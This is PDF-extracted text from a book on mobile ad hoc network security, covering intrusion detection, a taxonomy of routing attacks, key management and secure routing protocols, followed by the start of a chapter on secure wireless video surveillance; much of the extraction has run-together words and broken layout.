does not distinguish between maliciousness and
node faultiness. Upon the failure rate reaching the

futurE trEnds Finally, the most significant ad hoc network

characteristics which affect the IDS model are the
Research in ad hoc network security is in its three Ds: distributed, decentralized and dynamic
embryonic stages. Ad hoc network IDS is even nature. An IDS architecture which considers these
morerudimentary,sincethequestforan three factorswillessentiallybeefficient.Howeve
efficient
intrusion prevention mechanism is not over yet the IDS architecture should also consider the limi-
(Hubaux, Buttyan, & Capkun, 2001). Intrusion tations of detection methodologies.
prevention and detection mechanisms are mutually
productive for ad hoc security. Clearly, a concrete
and practical IDS model for ad hoc networks is conclusIon
yet to be evolved.
Historically, conventional IDS systems were The implementation of intrusion detection systems
subjected to intensive research and analysis before in ad hoc networks is hindered by the inherent
becoming practical. Analogous to conventional characteristics of these networks. These charac-
IDS, ad hoc intrusion detection needs more re- teristicswereexaminedandtheirsignificancewa
search. It is eminent that consideration of ad hoc observed. The differences between conventional
network characteristics plays a vital role in the and ad hoc intrusion detection systems are de-
denouement of the IDS model. In literature, most tailed. Requirements of an effective ad hoc IDS
of the research focus was on IDS architectures. are studied. Various proposed IDS architectures
However, IDS in ad hoc networks require in- and methodologies are explored and their strengths
novative detection strategies to resolve the issue and weakness are discussed. The future of ad hoc
pertaining to IDS in ad hoc networks. IDS depends mostly on the statistical properties
To summarize, we enumerate below the obser- of ad hoc network’s routing behaviors. Therefore,
vations made from the study of ad hoc IDS models considerable research and development is required
proposed in the literature. in this domain.
First, routing security should be the crux of
the IDS. Similar to conventional IDS, intensive
statistical analysis and research is required on the rEfErEncEs
feasibility of statistical and rule-based detection
methodologies, in respect to routing behavioral Andrew, B., Smith. (May 2001). An examination
data. Routing control messages produce a new kind of an intrusion detection architecture for wire-
of audit trails. New features linked to the proper- less ad hoc networks. Paper presented at the 5th
ties of routing control message have to be derived. National Colloquium for Information System
These derived parameters will aid in analyzing the Security Education.
feasibility of various detection methodologies.
Second, the absence of a centralized node Athanasiades, N., Abler, R., Levine, J., Owen, H.,
necessitates innovative adaptation in the IDS. & Riley, G. (2003). Intrusion detection testing and
Adaptation is the process of learning new attacks, benchmarking methodologies. Paper presented at
attack resolving techniques (responses), as well the First IEEE International Workshop on Infor-
as changing statistical parameters with respect to mation Assurance, IWIAS 2003.
the ad hoc network environment. Adaptation in a Awerbuch, B., Curtmola, R., Holmer, D., Nita-Ro-
highly dynamic network is an interesting and new taru, C., & Rubens, H. (2004). Mitigating Byzantine
challenge. Efficiency of various computational attacks in ad hoc wireless networks. John Hopkins
intelligence methods, which are also used in con- University, Department of Computer Science.
ventional IDS, has to be analyzed. Learning new
attacks through intelligence in ad hoc IDS paradigm Awerbuch, B., Curtmola, R., Holmer, D., Rubens,
is an unexplored research domain. H., & Nita-Rotaru, C. (2005). On the survivability
of routing protocols in ad hoc wireless networks.

Paper presented at the Security and Privacy for Hubaux, J.-P., Buttyan, L., & Capkun, S. (2001).
Emerging Areas in Communications Networks, The quest for security in mobile ad hoc networks.
SecureComm 2005. Paper presented at the 2nd ACM international
Symposium on Mobile Ad hoc Networking &
Balajinath, B., & Raghavan, S. V. (2001). Intru-
Computing, Long Beach, CA.
sion detection through learning behavior model.
Computer Communications, 24(12), 1202-1212. Jacoby, G. A., Marchany, R., & Davis, N. J., IV.
(2004). Battery-based intrusion detection a firs
Bhargava, S., & Agrawal, D. P. (2001, Fall). Secu-
line of defense. Paper presented at the Information
rityenhancementsinAODVprotocolforwireless
Assurance Workshop, 2004/Proceedings from the
ad hoc networks. Paper presented at the IEEE 54th
Fifth Annual IEEE SMC.
Vehicular Technology Conference, VTC 2001.
Kachirski, O., & Guha, R. (2002). Intrusion de-
Brutch, P., & Ko, C. (2003). Challenges in intru-
tection using mobile agents in wireless ad hoc
sion detection for wireless ad-hoc networks. Paper
networks. Paper presented at the IEEE Workshop
presented at the Applications and the Internet
on Knowledge Media Networking, 2002.
Workshops, 2003.
Kong, J., Hong, X., & Gerla, M. (2003). A new set of
Bykova, M., Ostermann, S., & Tjaden, B. (2001).
passive routing attacks in mobile ad hoc networks.
Detecting network intrusions via a statistical
Paper presented at the Military Communications
analysis of network packet characteristics. In
Conference, MILCOM 2003. IEEE.
Proceedings of the 33rd Southeastern Symposium
on System Theory, 2001. Lamport, L., Shostak, R., & Pease, M. (1982). The
Byzantine generalsproblem. ACM Transactions
Debar, H., Dacier, M., & Wespi, A. (1999). To-
on Programming Languages and Systems, 4(3),
wards a taxonomy of intrusion-detection systems.
382-401.
Computer Networks-the International Journal of
Computer and Telecommunications Networking, Little, M. (2005). TEALab: A testbed for ad hoc
31(8), 805-822. networking security research. Paper presented at
the Military Communications Conference, MIL-
Duda, R. O., Hart, P. E., & Stork, D. G. (2000).
COM 2005. IEEE.
Patternclassification (2nd ed.). Wiley Inter-Science
Publication. Michael, C. C., & Ghosh, A. (2000). Two state-
based approaches to program-based anomaly
Hijazi, A., & Nasser, N. (2005). Using mobile
detection. Paper presented at the 16th Annual
agents for intrusion detection in wireless ad hoc
Conference Computer Security Applications,
networks. Paper presented at the Second IFIP
ACSAC ’00.
International Conference on Wireless and Optical
Communications Networks, WOCN 2005 Mishra, A., Nadkarni, K., & Patcha, A. (2004).
Intrusion detection in wireless ad hoc networks.
Hossain, M., Bridges, S. M., & Vaughn, R. B.,
IEEE Wireless Communications, 11(1), 48-60.
Jr. (2003). Adaptive intrusion detection with data
mining. Paper presented at the IEEE International Nadkarni, K., & Mishra, A. (2003). Intrusion de-
Conference on Systems, Man and Cybernetics, tection in MANETS: The second wall of defense.
2003. Paper presented at the 29th Annual Conference of
the IEEE Industrial Electronics Society, IECON
Huang, Y. A., & Lee, W. (2004). Attack analysis
2003.
and detection for ad hoc routing protocols. Recent
advances in intrusion detection, proceedings Papadimitratos, P., & Haas, Z. (2002, January 27-
(Vol. 3224, pp. 125-145). Berlin: Springer-Verlag 31). Secure routing for mobile ad hoc networks. Pa-
Berlin. per presented at the SCS Communication Networks

Security Measures for Mobile Ad-Hoc Networks (MANETs)
Table 1. continued
Increasing the noise level, which leads to the decrease of the signal to noise ratio (S/N), causes degradation of the
Noise Signal bandwidth and roll-back of the transmission rates. In severe cases it can lead to DoS attack.
Denial of service attack can also impact the media access control (MAC) layer. For this, the attacker does not have to
be physically tampering with the infrastructure, though the ability to inject frames directly into the channel is required.
A MAC-layer-based DoS attack offers the following advantages to the attackers:
DoS - Medium Independency: Since many MAC-based communication protocols (i.e., 802.11) have similar MAC layer
structures, a single MAC-layer attack can devastate many different infrastructures.
- Energy Efficiency: A MAC layer attack does not necessarily and directly deal with the weakening of the com-
munication signals, therefore these types of attacks require less amount of energy compared to the physical layer
attacks
Jamminghappenswhenthecommunicationchannelisooded
fl withMAClayerqueries.Inthisscenario,theMAClay
Jamming will not be able to service legitimate queries. Jamming can be considered as a DoS attack at MAC layer.
In this type of attack, the attacker (or a malicious node) advertises a zero routing metric for all destinations. This
Blackhole causes all the neighbor nodes to route all their packets through the attacker (node). This can also be recognized as a
Attack DoS attack at the network layer.
In this attack, the attacker records packets at one location in the network and tunnels them to another location in the
Wormhole network. This can cause an abrupt of service (DoS) due to the invalidity of routes for the packets, which are routed
Attack through this tunnel.
This type of attack incorporates more than one attacker (malicious adversaries). A Byzantine attack involves the
Byzantine leaking of authentication/authorization secrets so that the malicious adversaries are indistinguishable from legitimate
Attack nodes. Therefore when adversaries are accepted in the communication schemes, they can cause various types of mali-
ciousactivities,suchasroutechanges,routeloops,andnonoptimalroutes.Byzantineattacksareve
identified.
In this scenario, a compromised node may leak confidential and vital information to
- unauthorized node
Information work, such as, geographic location of nodes (sender, receiver, and intermediate nodes), network topology, and optimal
Disclosure routes.
This type of attack can be discussed as a physical layer issue or a network layer issue. In the network layer, this type
Resource of attack directly deals with routing issues rather then energy related issues. Therefore, a malicious node tries to con-
Consumption sume and waste the resources in the network through network layer-related activities, such as, unnecessary requests
Attack for routes, very frequent beacon packet creations, initiating a lot of route discoveries, and forwarding of staled packets
to nodes.
Routing Thesetypesofattacksdealwiththeroutingalgorithmsandprocedures,suchas,routingtableoverflowa
Attacks packetreplication,routecachepoisoning,andrushingattack.Thesearefurtherdiscussedmoreinthe
Other types of network layer attacks include attacks on IP header/address (address sweep scan, timestamp attack, source
Others routeattack,recordrouteattack,andfragmentDoSattack)andinternetcontrolmessageprotocol(IC
Attacks on Attacksonthetransportcontrolprotocol(TCP)includeacknowledgementACK)
( DoS,synchronizationSYN)
( ood
fl
TCP LAND attack (where spoofed TCP SYN is sent) “sending a spoofed TCP/SYN packet,” session and tear-down attacks,
session hijacking, and port-scan attack.
Attacks on Attacks on user datagram protocol ( UDP) include port attack, ( UDP ooding)
fl and session hijacking using
( a va
UDP session ID).
Session, Higherlayerssession,
( presentation,andapplicationlayers)aremorespecificandapplicationoriented.T
Presentation, types of attacks vary in different networks and applications.
Application
0
to the OSI layered model, namely, physical, MAC, • Consumption of relatively more bandwidth
network, transport, session, presentation, and compared to identical amount of data transfer
application layers. Internet-based systems have in other routing schemes.
adopted a more simplified five-layer approach • Increaseoftrafficoverheadduetotheconstant
based on transport control protocol (TCP)/IP pro- updates.
tocol stack suite, in which the top three layers of
the seven-layer model (session, presentation, and The advantage is that there is no delay in route
application layers) have been merged as a single and destination determination. Examples of proac-
layer: the TCP/IP application layer (see Figure 2) tive routing protocols are (Lang, 2003):
(Adibi, Erfani, & Harbi, 2006; Lu, 2002; Manoj
& Murthy, 2005). • DSDV (destination-sequenced distance vector
routing)
wireless routing Protocols in • OLSR (optimized link state routing)
general
Reactive (On-demand)
Ad hoc routing protocols are divided into the fol-
lowing categories: In reactive protocols, routes are determined as they
are needed through “route request (RREQ)” and
Proactive (Table-driven) “route reply (RREP)” inquiries. The advantage of a
reactive routing protocol is the fact that it requires
In these types of routing protocols, nodes constantly relativelyfewertrafficoverhead.Thedisadvanta
search for routing information and storing them of reactive routing protocols, however, is relatively
in tables, therefore when a route is needed, the longer delays due to the sending and receiving
route is already known. The major disadvantages RREQsandRREPs.Examplesofreactiverouting
of proactive routing protocols are: protocols are (Lang, 2003):
Figure 2. OSI Model vs. TCP/IP protocol stack
0
Figure 3. RREQ and RREP inquiries in reactive routing protocols
•DSR (dynamic source routing) MAnEt sEcurIty rEquIrEMEnts

•AODV (ad hoc on-demand distance vector
routing) Ad hoc networks require relatively stronger secu-
rity measures due to the nature of their topologi-
Besides reactive and proactive schemes, other cal weaknesses. The fact that there is no central
types of routing protocols include (Lang, 2003): infrastructure for ad hoc entities requires that
every individual ad hoc element be part of the
• Hybrid (pro-active/reactive): A blend of broader security scheme. Other issues also play
reactive and proactive schemes, such as, zone roles, such as limited energy (relatively low battery
routing protocol (ZRP). life) and lack of physical security (i.e., the device
• Hierarchical: Topology is divided into sev- could be stolen or tampered with). To remedy these
erallocalregionsandlocaltraffic ishandled
limitations, it is necessary to establish cooperation
locally, such as, hierarchical state routing enforcement between all entities and utilize secure
protocol (HSR). routing schemes and efficient key management.
• Geographical: These protocols use geo- The last two issues are discussed in this chapter
graphical coordinates in locating routing in more details.
information, such as, location-aided routing
(LAR). secure routing
• Power aware: In these protocols, power
consumption is a serious factor, such as The objective of secure routing is to provide a means
(Maleki, Dantu, & Pedram, 2002), power- for authenticating routing decisions and ensuring
aware source routing (PSR). information integrity. The entity authentication
• Multicast: Multicasting is the transmission includes authentication of source, destination,
ofdatatogroupsofmobile-hostsidentified andalloftheintermediatenodes.Forspecificad
by a single destination address, such as, hoc routing protocols, different measures, such
multicast ad hoc on-demand distance vector as asymmetric or symmetric key cryptography,
MAODV)
( . could be used.
0
AttAcks on Ad Hoc routIng when nodes drop them due to the duplicate
Protocols suppression).
• Isolation: Ability to identify misbehaving
Attacks on ad hoc routing protocols are presented nodes and disable them from interfering with
in Figure 4 and Table 2. Again these attacks are the routing schemes. Preventing wormhole
categorized into passive and active attacks. Each and black hole are examples of this cat-
attack works in such a way as to paralyze a sec- egory.
tion of the routing protocol, therefore securing the • Lightweight computations: Assigning
routing protocols is very important. heavy computing tasks to the least possible
In order to prevent attacks on routing protocols, number of nodes (battery power protection)
security measures should be taken into consid- to prevent sleep deprivation.
eration to prevent attacks and fortify the routing • Location privacy: Protecting information
algorithms. These measures should provide the about the location of nodes in a network and
followings: the network structure, to prevent location
disclosure.
• Availability: Ultimately it should always be • Self-Stabilization – Automatically recover
possiblewith ( veryhighprobability)tofrom findanyprobleminafiniteamountoftime
an available route from any source to any without human intervention.
destination within the wireless range. In ad • Byzantine robustness: This requires the
hoc routing protocols, this feature should function of the routing protocol to work cor-
includepreventingroutingtableoverfl owan
rectly ( even if some of the nodes participating
entry in the table to a nonexisting destination) in routing are intentionally disrupting its
and rushing attacks (an attacker disseminates operation. This is important in preventing
RREQs quickly throughout the networks, impersonation attacks.
suppressing any later legitimate RREQs
Figure 4. Active and passive attacks in ad hoc routing protocols (Adapted from Wang, Lu, & Bhargava,
2003)
0
Table2.Definitiontoafewofattacksforadhocroutingprotocols
Route Broken Message Sets false route error to send a message back to the source (route discovery is reinitiated). This exhausts
the limited bandwidth.
Malicious Route Request Sends an invalid route request. This exhausts the limited bandwidth.
False Distance Vector This involves replying “one hop to destination” to every request and selecting an enough large sequence
number. This is an attack on the connectivity.
False Destination Sequence This is to select a large number of hop to the destination, which is an attack on the connectivity.
Routing Table Overflow A malicious node advertises routes to nonexisting nodes. Proactive routing protocols are more vulner-
able.
Routing Table Poisoning A malicious or compromised node sends fictitious routing updates or modifies genuine route u
which causes suboptimal routing.
Packet Replication A malicious or compromised node replicates stale packets causing excessive bandwidth consumption.
Route Cache Poisoning An advisory can poison the route cache, which is a major issue for on-demand routing protocols, since
they maintain a route cache to all known nodes.
AnadvisorythatreceivedaRREQfromasourceoods
fl thenetworkquicklybeforeanyotherlegitim
nodes can react, causing other nodes to believe that they have received duplicates, thus discarding the
Rushing Attack legitimate responses. Therefore any route discovered by the source node would contain the advisory node
information as one of the legitimate intermediate nodes.
Possible solutions • Authentication among hosts: This requires

two-way authentication schemes for all par-
To offer secure routing protocols, the following tiestopreventimpersonationspoofing) ( .
solutions are used: • Preventing traffic pattern detection: This
is important in hiding the traffic patterns
• Trusted route discovery: To avoid internal and frequency of transmitting information,
attacks, the route discovery phase in ad hoc as part of anonymous routing.
routing protocols should send packets via • Intrusion detection: Monitors the behavior
trusted routes. of suspected hosts for anomaly detection and
• Redundant paths and multipath routing: attack prevention.
Having redundant path increases route robust- • Securing the medium: To prevent physical-
ness by providing more route choices, such layer-based DoS attack, there has been a few
as in multipath ad hoc routing protocols. methods introduced as security deterrence
• Nondisclosure method and anonymous schemes, such as:
routing: Anonymous routing avoids the  Frequency inversion
location disclosure by using distributed  Frequency hopping
independent security agents. This way out- These two methods will be discussed in details
siders could not identify the communicating in the next section.
parties.
• Hierarchical structure or zone-based rout-
ing: This type of routing protocol provides cHAllEngEs In sEcurE routIng
a foundation for authentication and local for MAnEts
link-state routing.
As mentioned previously, securing routing proto-
cols for wireless systems is more challenging than
0
securing wired protocols, because not only do all  Data encryption (long-term, short-term)

of the possible wired-based attacks apply to ad hoc keys
networks, but also mobility allows new attacks.  Keys based on random number
The most important difference is the vulnerability generation

of the medium. This is very important because  Key encryption keys, which are further
everyone shares the same medium (open air) and used for wrapping keys
if extra attention is not giving to its security, it  Derivation keys used from master keys
could contribute to a DoS attack (lack of avail- and master keys used from derivation
ability or jamming). Therefore the followings are keys
the extra challenges for securing wireless routing  Key transport for public and private
protocols: keys
 Static key agreement used for public and
• Intrusion detection: Intrusion detection private keys
attempts to detect any malicious or unauthor-  Ephemeral key agreement for public and
ized activity, either caused by an internal private keys
entity or an external source. There are a few
types of intrusion detection systems: Key management faces the following particular
 Anomaly-based : Compares the challenges:
activitiesinanetworkwithapredefined
normal activity map. In these systems, a  Lack of a security infrastructure
sudden change in the activities would  Limited processing power
trigger anomaly alarm detection. Other  It should be fully distributed with
types include: network intrusion minimal dependencies
detection system (NIDS), host-  Domain parameter and public key
based intrusion detection system validations
(HIDS), application protocol-based  Keys and related material compromise
intrusion detection system (APIDS), and  Key recovery: consideration and policy
protocol-based intrusion  Audit and accountability issues
detection system (PIDS).
• Secure routing: This shares a common Therefore the challenges are trust model,
ground with a layered approach, in a sense cryptosystems, key creation, key storage, and key
that security mechanisms have been inte- distribution.
grated with the normal routing procedures. • Securing the medium: To prevent DoS, the
Routing is mostly covered in the network following techniques are used as security
layer. Therefore secure routing is provisioned deterrents:
in the network layer. Secure routing will be  Frequency inversion: The process of
discussed in details later in this chapter altering the signal’s frequency spectrum
• Key management service: Because of the in such a way that the signal could not
difficulties in key exchange, the - key man be reconstructed and understandable
agement is a challenge in ad hoc networks. without the knowledge of the inversion
The following schemes are a few examples pattern.
of existing key exchange methods ("Key  Frequency hopping: Dividing the
Management," 2001): spectrum into various frequencies and

using different frequencies in a
 Signature keys predetermined fashion.
 Signatureverificationkeys  Shared secret frequency key: Sharing
 Authentication (public, private, secret) the secret of frequency-pattern between

keys transmitters.

0
kEy MAnAgEMEnt APProAcHEs point. The fact that there is a known center
for key distribution and its location is known
Due to the variable nature of ad hoc network to- to all, makes the AKDC prone to a variety of
pologies and the physical and resource limitations, attacks, including DoS attack. This problem
key management is of great importance. There are is remedied by the use of a decentralized and
many proposals for the key management for ad hoc distributed scheme.
protocols, however we introduce two methods, • Decentralized key generation and distribu-
namely, ad hoc key distribution center (AKDC), tion: In a DKGD scheme (Figure 6), the key
and decentralized key generation and distribution management scheme is distributed across the
(DKGD) (Adibi et al., 2006): wireless range through DKGD agents. Every
ad hoc element discovers the closest DKGD
• Ad hoc key distribution center: As shown agent and binds with it. The fact that DKGDs
in Figure 5, AKDC uses a centralized ad hoc are distributed across the network poses less
scheme for key management, distribution, and of a security concern as the single point of
access. In the AKDC, each device wishing to failure is no longer an issue. No matter if
communicate with another device will have AKDC or DKGD is used, all legitimate lo-
to undergo the following series of processes cal ad hoc elements should register with the
by the AKDC: AKDC or the DKGD.
 Identity and location determination • Ad hoc gateway access control (AGAC):
 Authentication So far, the AKDC and DKGD schemes as-
 Authorization sume in-domain communications among
 Key provision ad hoc elements. However for inter-domain
 Key delivery security measures when an outside element
A lot of intelligence and power must be inte- seeks communication to a local element, a
grated into the design of an AKDC, however, new element, which is called the AGAC, is
there are a few downsides of having a central responsible for the security concerns. AGAC
FigureAKDC
5. scheme(AdaptedfromAdibietal.,206)
0
Figure6.DKGDscheme(AdaptedfromAdibi,Erfani,&Harbi,206)
Figure7:Self-organizedcertificateauthorities(SOCA)(AdaptedfromMichiardi,204)
agents are located at the boundaries of radio server group. This provides and update for
domains, that is, where two or more local ad certificate services for all the participat
hoc domains intersect. nodes. For an efficient certificate delivery
• Secure and efficient key management service, a ticket mechanism is introduced
(SEKM): SEKM (Wu, Wu, Fernandez, Ilyas, and used.
& Magliveras, 2005) creates a public key • Self-organized CA (SOCA) (Michiardi,
infrastructure (PKI) using a secret shared 2004): In traditional cryptographic systems,
key scheme and on top of an underlying mul- there is one sender, one receiver, and an
ticast server groups. In SEKM, a view of the eavesdropper who is the opponent. However
certificateauthorityCA) ( iscreatedby a each
SOCA is based on threshold cryptography.
0
Threshold cryptography allows one to share  Web of trust (PGP): Which is a Peer-
the power of a cryptosystem in which the based (one-to-one) system and requires
power to regenerate a secret key is shared noCertificateAuthority.PGP
among several agents (Figure 7). The ad- symmetric and public-key cryptography
vantage of this is the distributed approach schemes and includes a mechanism,
with self-organization. The downside is the which binds the public keys to the
network density. user identities.
 Crypto-based ID: A crypto-based ID
(CBID) requires no infrastructure and

sEcurIty MEcHAnIsMs In uses a binding between address and
MAnEts signature.
 ID-based crypto: The ID-based crypto
There are several mechanisms, which are embed- suggests that having an identity
ded into the protocol schemes, which contribute implies being authorized, therefore no
to the robustness of security. Below is a list of a certificates areneeded.
few of these mechanisms.  Context-dependent authentication:
Authentication is based on the content

• Multipath routing: Multipath routing (Bo- of the message.
num & Othman, 2003) works by enhancing  Password authenticated key exchange
dataconfidentialitythroughthetransmission (PAKE): In a PAKE, two or more
of data via multiple paths. This is done to communication parties, based on their
prevent any fixed unauthorized nodes from knowledge of a password only, establish
attaining useful data. This requires no en- a cryptographic key through a message
cryption as data is already “split” among exchange, in such a way that an
various paths. unauthorized entity cannot participate
• Hierarchical routing: Hierarchical rout- in the scheme and is kept from
ing (Rhee, Park, & Tsudik, 2004) is one of guessing the password. There are two
the categories of ad hoc routing protocols forms of PAKE, which are balanced and
in which traffic handling is done through augmented schemes.
different layers and local activities are kept  Cooperation Enforcement Mechanisms
local. Therefore there is no need to broadcast using Game Theoretical Approaches:
all changes to the entire radio domain. Only Game theory is a powerful tool that
global moves are reported across the entire models interactions among participating
network. In the security and key management entities. Each player tries to maximize
cases, the architecture could use a two or more some utility function in a distributed
layered key management approach where manner. Nash equilibrium is where the
groups of nodes are divided into cell groups games settle, assuming the equilibrium
consisting of ground nodes and control exists, however, since nodes usually act
groups containing cell group managers. selfishly, theequilibriumpointmight
• Tunneling: Tunneling (Choi, Song, Cao, & not be the optimal social point.
Porta, 2005) is widely used in many security
schemes, such as virtual private networks
(VPNs) and IP-Security (IPSec). sEcurE Protocols for
• Other Measures in MANETs: Other mea- MAnEts
sures, which could be adopted in ad hoc sce-
narios are (Menezes, Oorschot, & Vanstone, The main idea for these protocols is to offer ex-
1996): tended security, therefore with only security in

mind, the entire protocol functionalities have been destination and to store a local trust value related
designed for security in the the network layer. Four to each node throughout the network. A trust value
of these protocols are introduced as follow: is also assigned to each path based on nodes trust
values. The paths with higher trust values are
ArIAdnE (A secure on-demand preferred and selected for routing.
routing Protocol for Ad Hoc
networks) sdsr (secure dynamic source
routing)
ARIADNE (Hu, Perrig, & Johnson, 2002) relies
onlyonhighlyefficientsymmetriccryptographic SDSR (Kargl, Geiss, Schlott, & Weber, 2005) pre-
systems and does not require a trusted hardware vents various potential (active and passive) attacks
or powerful processors. Routing messages can to the ad-hoc-based networks. It also deals with
be authenticated using ARIADNE through one selfishnodesinthefollowingscenarios:
of the following three schemes: 1) Using shared
secrets among each pair of nodes, 2) Using shared • Motivation-based approaches: Try to moti-
secrets among communicating nodes together vate network users to actively participate in
with broadcast authentication, and 3) Using digital the MANET.
signatures. ARIADNE works well with timed ef- • Detect and exclude: This scheme detects
ficientstreamloss-tolerantauthentication andexcludes
TESLA)
( selfishnodesfromtherouting
(Hu et al.,) 02which is an efficient broadcast scheme
authentication scheme that requires loose time • Mobile Intrusion Detection System (MobIDS):
synchronization, where a receiver knows an upper Focuses on integrating with other mecha-
bound of difference between sender’s local time nismsfordetectingselfishnodes.
and the receiver’s local time.
SEAD (Secure Efficient Distance

vector routing for Mobile wireless conclusIon
Ad Hoc networks)
Attacks can be categorized as per node behaviors,
SEAD (Hu, Johnson, & Perrig, 2002) is based on protocol schemes, or layered approaches. Security
the design of the destination-sequenced distance- challenges in MANETs include securing the me-
vector routing protocol (DSDV). To prevent DoS, dium (preventing from DoS attack, etc.), securing
SEADusesefficientone-wayhashfunctions theand
routing schemes, intrusion detection and pre-
does not include the usage of asymmetric crypto- vention, key management, peer-to-peer security
graphic operations. SEAD is robust against multiple options, user and data authentication/authorization,
uncoordinated attackers, which creates incorrect data encryption, and digital signatures.
routing state for other nodes.
sAdsr (security-Aware Adaptive rEfErEncEs

dynamic source routing Protocol)
Adibi, S., Erfani, S., & Harbi, H. (2006, May).
Security routing in MANETs: A comparative
SADSR (Ghazizadeh, Ilghami, Sirin, & Yaman,
study. Paper presented at the Electro/information
2002) includes an authentication scheme in which,
Technology (EIT) Conference.
the routing protocol messages are authenticated
using asymmetric cryptographic-based digital Bonum, S., & Othman, J. B. (2003). Data security
signatures.The basic idea behind the functional- in ad hoc networks using multipath routing. In
ity of SADSR is to have multiple routes to every Proceedings of the 14th IEEE International Sym-

posium on Personal, Indoor and Mobile Radio Manoj, B. S., & Murthy, C. S. R. (2005, January).
Communication (PIMRC 2003), vol. 2, (pp. 1331 Transport layer and security protocols for ad hoc
-1335). Beijing, China. wireless networks. Retrieved October 7, 2007,
fromhttp:www./ phptr.com/articles/article.asp?p=
Choi, H., Song, H., Cao, G., & Porta, T. L. (2005).
8seqNum=1
4&9 1 63 &rl=1
0
Mobile multi-layered IPsec. Paper presented at
the INFOCOM. Menezes, A. J., Oorschot, P. C. V., & Vanstone, S.
A. (1996). CRC handbook of applied cryptography.
Ghazizadeh, S., Ilghami, O., Sirin, E., & Yaman, F.
CRC Press.
(2002). Security-aware adaptive dynamic source
routing protocol. ILCN. Michiardi, P. (2004, March). Security in wireless
ad hoc networks. Institut Eurecom.
Hu, Y. C., Johnson, D. B., Perrig, A. (2002). SEAD:
Secureefficientdistancevectorrouting Rhee,for
K. mobile
H., Park, Y. H., & Tsudik, G. (2004,
wireless ad hoc networks. MCSA. June). An architecture for key management in
hierarchical mobile ad-hoc networks. Journal of
Hu, Y. C., Perrig, A., & Johnson, D. B. (2002).
CommunicationsandNetworks, (2). 6
Ariadne: A secure on-demand routing protocol
for ad hoc networks. Paper presented at the MO- Wang, W., Lu, Y., & Bhargava, B. (2003, March).
BICOM. On security study of two distance vector routing
protocols for ad hoc networks. Purdue Univer-
Kargl, F. (2006, November). Threats and security
sity, CERIAS and Department of Computer Sci-
requirements for VANETs secure vehicle - com
ences.
munication. Paper presented at the C2C-CC Sec.
Workshop. Wu, B., Wu, J., Fernandez, E. B., Ilyas, M., &
Magliveras, S. (2005). Secureandefficientkey - man
Kargl, F., Geiss, A., Schlott, S., & Weber, M. (2005).
agement in mobile ad hoc networks. Elsevier.
Secure dynamic source routing. Paper presented
at the HICSS.
Key Management, National Institute of Standards
and Technology (NIST). (2001, November). Re-
kEy tErMs
trieved October 7, 2007, from http://csrc.nist.
gov/encryption/kms/Key%20Mgmt%20Guideli Access Control: This is a security mechanism to
ne%20Overview.ppt make sure that only legitimate parties have access
to the data they are supposed to have access.
Lang, D. (2003, March). A comprehensive over-
view about selected ad hoc networking routing AKDC: Ad hoc key distribution center is a
protocols (Tech. Rep. No. TUM-I0311). Technische central component in an ad hoc network responsible
Universität München, Department of Computer for providing keys to ad hoc elements.
Science.
ARIADNE: A secure on-demand routing
Lu,Q.December)
02 , ( . Vulnerabilityofwireless protocol for ad hoc networks.
routing protocols. University of Massachusetts
Amherst. Authentication: Authentication is required
to make sure communicating parties are the ones
Maleki, M., Dantu, K., & Pedram, M. (2002, who they claim to be.
August). Power-aware source routing protocol
for mobile ad hoc networks. In Proceedings of Availability: A stochastic measure of predict-
the Symposium on Low Power Electronics and ing the availability of the communication channel
Design (pp. 72-75). and resources to the users

CA: Certificate authority is responsible for

Nonrepudiation: This is a concept of ensuring
issuingdigitalcertificates. that none of the communicating parties can deny the
fact that they had sent or received certain data.
Confidentiality: This is a basic security re-
quirement in which the address, location, and/or SADSR: Security-aware adaptive dynamic
the data transferring between two communicating source routing protocol.
parties are to be kept as secrets.
SEAD: Secureefficientdistancevectorrouting
DKGD: Decentralize key generation and for mobile wireless ad hoc networks.
distribution is another key distribution scheme
SEKM: Secureandefficientkeymanagementis
for ad hoc networks in which the key distribution
another key management scheme in which involves
mechanism is done by distributed elements, not
public key infrastructure.
by a centralized entity.
SDSR:Secure dynamic source routing.
Integrity: This is another basic security re-
quirement. Integrity guarantees the correctness of SOCA: Self-organized CA is a threshold-based
the data transferring between two communicating cryptosystem in which the power is shared among
parties, or their location information. different CAs.

Chapter XXXII
A Novel Secure Video
Surveillance System Over
Wireless Ad Hoc Networks
Hao Yin
Tsinghua University, China
Chuang Lin
Zhijia Chen
Geyong Min
University of Bradford, UK
AbstrAct
The integration of wireless communication and embedded video systems is a demanding and interest-
ing topic which has attracted significant research efforts from the community of tele
This chapter discusses the challenging issues in wireless video surveillance and presents the detailed
design for a novel highly-secure video surveillance system over ad hoc wireless networks. To this end,
we explore the state-of-the-art cross domains of wireless communication, video processing, embedded
systems, and security. Moreover, a new media-dependent video encryption scheme, including a reliable
data embedding technique and real-time video encryption algorithm, is proposed and implemented to
enablethesystemtoworkproperlyandefficientlyinanopenandinsecurewirelessenviron
experiments are conducted to demonstrate the advantages of the new systems, including high security
guarantee and robustness. The chapter would serve as a good reference for solving the challenging is-
sues in wireless multimedia and bring new insights on the interaction of different technologies within
the cross application domain.
IntroductIon of a highly secure and reliable video surveillance

system attracts significant interests from b
With the ever-increasing security demands of mili- academia and industry. The implementation and
tary and scientific applications, theefficiency development of such a system are greatly affected
A Novel Secure Video Surveillance System Over Wireless Ad Hoc Networks
by the techniques in wireless communication, hoc wireless networks. The rest of this chapter is
video processing, embedded systems, and security organized as follows. Section 2 provides a review
guarantee. of wireless networks, ad hoc solution and security
Recent advances in embedded system and wire- issues. Section 3 presents the design and imple-
less communications are enabling cost-effective mentation for the new video surveillance system
digital wireless multimedia systems. The forth- and Section 4 evaluates its performance. Section 5
coming integration of wireless communications highlights the future trends in the relevant research
and embedded video systems is a demanding and areas. Finally, Section 6 concludes this chapter.
interesting research topic. Video surveillance has
resorted to wireless transmission due to the several
serious problems when the traditional coaxial or bAckground
high-techfiber-opticcablesareadoptedtotransmit
video images from the surveillance cameras to the wireless networks
stations at which the images are monitored and/or
recorded. Compared with the traditional wire-line Wireless technologies, in the simplest sense, en-
counterparts, wireless video surveillance systems able one or more devices to communicate without
do not require expensive and time-consuming physical connections (without requiring peripheral
system constructions and civil-engineering work. cabling). Wireless networks serve as the transport
They can therefore be deployed rapidly with negli- mechanism among mobile devices or between
gible environmental impact. Furthermore, wireless thesedevicesandthefixedwired networkse. ( g.,
systems generally require lower costs of network enterprise networks and the Internet). A wireless
maintenance, management, and operation. network has tremendous advantages in comparison
However, some fundamental issues, such as with its wired counterpart: no network cable has to
framework design of wireless networks, video beinstalledthroughwallsandoors, fl thusgreatl
processing, video data transmission, video quality reducing the cost and making the architecture
